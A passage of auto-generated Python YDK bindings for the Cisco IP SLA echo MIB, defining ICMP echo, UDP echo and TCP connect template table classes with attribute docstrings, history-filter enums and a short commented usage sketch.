self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides description to the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For a regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
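# --- Illustrative sketch (not part of the generated bindings) ----------------
# One way a UDP echo template entry might be populated and attached to the
# table's YList. Leaf names come from CipslaUdpEchoTmplEntry; the concrete
# values (template name, source port, timeout) are hypothetical.
#
#   mib = CISCOIPSLAECHOMIB()
#   udp_tmpl = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry()
#   udp_tmpl.cipslaudpechotmplname = 'UDP-ECHO-TPL-1'   # key leaf, 1..64 chars
#   udp_tmpl.cipslaudpechotmplcontrolenable = True      # send control messages to the responder
#   udp_tmpl.cipslaudpechotmplsrcport = 49152           # 0..65535; leave unset to let the system pick
#   udp_tmpl.cipslaudpechotmpltimeout = 5000            # milliseconds
#   mib.cipslaudpechotmpltable.cipslaudpechotmplentry.append(udp_tmpl)
# ------------------------------------------------------------------------------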
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
